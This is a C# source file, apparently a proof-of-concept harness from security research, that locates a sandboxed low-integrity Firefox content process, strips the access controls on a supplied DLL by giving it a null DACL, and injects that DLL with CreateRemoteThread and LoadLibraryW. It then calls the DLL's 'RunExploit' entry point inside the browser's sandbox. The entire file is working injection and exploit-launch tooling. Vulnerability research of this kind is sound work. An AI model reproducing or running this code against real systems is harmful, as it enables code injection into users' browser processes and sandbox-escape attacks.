﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;

namespace InjectDll
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern SafeKernelObjectHandle CreateRemoteThread(
            SafeKernelObjectHandle hProcess,
            IntPtr lpThreadAttributes,
            IntPtr dwStackSize,
            IntPtr lpStartAddress,
            IntPtr lpParameter,
            int dwCreationFlags,
            OptionalInt32 lpThreadId
        );

        static NtProcess FindProcess(Func<NtProcess, bool> filter)
        {
            int session_id = NtProcess.Current.SessionId;
            bool is_64bit = NtProcess.Current.Is64Bit;
            using (var list = NtProcess.GetProcesses(ProcessAccessRights.AllAccess).ToDisposableList())
            {
                foreach (var p in list)
                {
                    if (p.IsDeleting || !filter(p) || p.SessionId != session_id || p.Is64Bit != is_64bit)
                        continue;
                    using (var token = p.OpenToken())
                    {
                        if (!token.Restricted || token.IntegrityLevel != TokenIntegrityLevel.Low)
                            continue;
                    }
                    return p.Duplicate();
                }
            }
            throw new ArgumentException("Couldn't find a suitable process");
        }

        static NtProcess FindFirefoxProcess()
        {
            return FindProcess(p => p.Name.Equals("firefox.exe", StringComparison.OrdinalIgnoreCase) && p.CommandLine.Contains("-contentproc"));
        }

        static NtThread StartThreadInProcess(NtProcess process, IntPtr func, string arg)
        {
            byte[] ss = Encoding.Unicode.GetBytes(arg + "\0");
            long addr = process.AllocateMemory(ss.Length);
            process.WriteMemory(addr, ss);

            var handle = CreateRemoteThread(process.Handle, IntPtr.Zero, IntPtr.Zero, func, new IntPtr(addr), 0, null);
            if (handle.IsInvalid)
                throw new SafeWin32Exception();

            return NtThread.FromHandle(handle);
        }

        static void LoadLibraryInProcess(NtProcess process, IntPtr base_address, string dll_path, IntPtr target, string cmdline)
        {
            IntPtr proc = SafeLoadLibraryHandle.GetModuleHandle("kernel32.dll").GetProcAddress("LoadLibraryW");
            if (proc == IntPtr.Zero)
            {
                throw new ArgumentException("Can't find LoadLibraryW export");
            }

            using (var thread = StartThreadInProcess(process, proc, dll_path))
            {
                if (thread.Wait(60) != NtStatus.STATUS_SUCCESS)
                {
                    throw new ArgumentException("Error waiting for injection thread");
                }
                if ((uint)thread.ExitNtStatus != (uint)base_address.ToInt64())
                {
                    throw new ArgumentException("Library failed to load.");
                }
            }

            using (var thread = StartThreadInProcess(process, target, cmdline))
            {
                if (thread.Wait() != NtStatus.STATUS_SUCCESS)
                {
                    throw new ArgumentException("Error waiting for main function to complete.");
                }
            }
        }

        static void SetFileSecurity(string dll_path)
        {
            using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(dll_path), null, FileAccessRights.WriteDac))
            {
                SecurityDescriptor sd = new SecurityDescriptor
                {
                    Dacl = new Acl() { NullAcl = true }
                };
                file.SetSecurityDescriptor(sd, SecurityInformation.Dacl);
            }
        }

        static void InjectDll(string dll_path)
        {
            SetFileSecurity(dll_path);
            using (var lib = SafeLoadLibraryHandle.LoadLibrary(dll_path, LoadLibraryFlags.DontResolveDllReferences))
            {
                IntPtr func = lib.GetProcAddress("RunExploit");
                if (func == IntPtr.Zero)
                {
                    throw new ArgumentException("Can't find RunExploit entry point");
                }

                using (var proc = FindFirefoxProcess())
                {
                    Console.WriteLine("{0}", proc.ProcessId);
                    LoadLibraryInProcess(proc, lib.DangerousGetHandle(), dll_path, func, string.Empty);
                }
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: InjectDll path.dll");
                    return;
                }

                InjectDll(Path.GetFullPath(args[0]));
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
